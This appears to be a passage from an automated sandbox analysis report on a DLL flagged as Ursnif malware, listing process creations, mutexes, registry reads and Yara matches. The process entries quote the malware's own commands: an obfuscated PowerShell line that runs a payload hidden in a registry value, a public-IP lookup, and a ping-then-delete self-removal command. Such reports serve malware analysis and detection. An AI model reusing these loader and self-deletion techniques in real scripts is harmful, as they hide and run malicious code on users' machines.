                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pfemrdpi -value gp; new-alias -name ndgrwui -value iex; ndgrwui ([System.Text.Encoding]::ASCII.GetString((pfemrdpi "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\f2vxj03f\f2vxj03f.cmdline
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFC15.tmp" "c:\Users\user\AppData\Local\Temp\f2vxj03f\CSCE6C104441B84417C9AABF578684269B5.TMP"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ci1gjuu1\ci1gjuu1.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES319C.tmp" "c:\Users\user\AppData\Local\Temp\ci1gjuu1\CSCFDAADE721EC5455F89368A25D31BABAB.TMP"
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\nhLAwAo49f.dll
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\F5DD.bi1"
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\nhLAwAo49f.dll",#1Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\nhLAwAo49f.dll",#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -hJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pfemrdpi -value gp; new-alias -name ndgrwui -value iex; ndgrwui ([System.Text.Encoding]::ASCII.GetString((pfemrdpi "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\f2vxj03f\f2vxj03f.cmdlineJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ci1gjuu1\ci1gjuu1.cmdlineJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFC15.tmp" "c:\Users\user\AppData\Local\Temp\f2vxj03f\CSCE6C104441B84417C9AABF578684269B5.TMP"Jump to behavior
                      Source: C:\Windows\System32\control.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES319C.tmp" "c:\Users\user\AppData\Local\Temp\ci1gjuu1\CSCFDAADE721EC5455F89368A25D31BABAB.TMP"
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\nhLAwAo49f.dll
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\F5DD.bi1"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER4A5.tmpJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04896DB6 CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,2_2_04896DB6
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\nhLAwAo49f.dll",#1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{B065705F-4F3D-628A-59E4-F3B69D58D74A}
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1348:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:588:120:WilError_01
                      Source: C:\Windows\System32\control.exeMutant created: \Sessions\1\BaseNamedObjects\{AC454211-1B05-BEF7-05A0-7FD209D42326}
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6740
                      Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\{04E081A2-93EB-D67B-3D78-776AC12C9B3E}
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: nhLAwAo49f.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\ci1gjuu1\ci1gjuu1.pdb source: powershell.exe, 00000012.00000003.673491356.00000212B82F4000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdb source: rundll32.exe, 00000002.00000003.643731503.0000000006160000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.646214990.0000000006210000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: d:\in\the\town\where\ahung.pdb source: loaddll32.exe, 00000000.00000000.458226282.0000000000480000.00000002.00000001.01000000.00000003.sdmp, nhLAwAo49f.dll
                      Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000002.00000003.643731503.0000000006160000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.646214990.0000000006210000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\f2vxj03f\f2vxj03f.pdb source: powershell.exe, 00000012.00000003.673491356.00000212B82F4000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\ci1gjuu1\ci1gjuu1.pdbine89 source: powershell.exe, 00000012.00000003.673491356.00000212B82F4000.00000004.00000020.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0489B2FF push esi; retf 2_2_0489B301
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0489820B push ecx; ret 2_2_0489821B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04897E20 push ecx; ret 2_2_04897E29
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B732B0 push ecx; ret 2_2_00B732B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B62C1A push ecx; mov dword ptr [esp], 00000002h2_2_00B62C1B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B737E3 push ecx; ret 2_2_00B737F3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B5A513 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00B5A513
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\f2vxj03f\f2vxj03f.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ci1gjuu1\ci1gjuu1.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\f2vxj03f\f2vxj03f.cmdlineJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ci1gjuu1\ci1gjuu1.cmdlineJump to behavior
                      Source: ci1gjuu1.dll.24.drStatic PE information: real checksum: 0x0 should be: 0xf773
                      Source: nhLAwAo49f.dllStatic PE information: real checksum: 0x872fe521 should be: 0xa9885
                      Source: f2vxj03f.dll.21.drStatic PE information: real checksum: 0x0 should be: 0xf75c
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\f2vxj03f\f2vxj03f.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\ci1gjuu1\ci1gjuu1.dllJump to dropped file

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000002.00000003.534721654.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.579816746.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.534964580.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.581908385.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.535072965.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.535101502.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.582808598.000000000504C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.679719876.00000212B8CDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.535038342.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.636315977.0000000006148000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000003.662858481.0000022D46E6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.534880441.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.535128040.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.534830912.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000003.662961657.0000022D46E6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6768, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6092, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 5304, type: MEMORYSTR
                      Source: Yara matchFile source: 2.2.rundll32.exe.4890000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.514a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4c194a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4c194a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.51f6940.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.514a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.51c94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000016.00000000.660579754.0000000000CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.709240338.0000000004C19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.581826169.00000000051C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.712190263.0000000004ECF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000000.661182267.0000000000CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000000.662297530.0000000000CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.581766632.000000000514A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Self deletion via cmd delete
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\nhLAwAo49f.dll
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\nhLAwAo49f.dll
                      Source: C:\Windows\SysWOW64\rundll32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
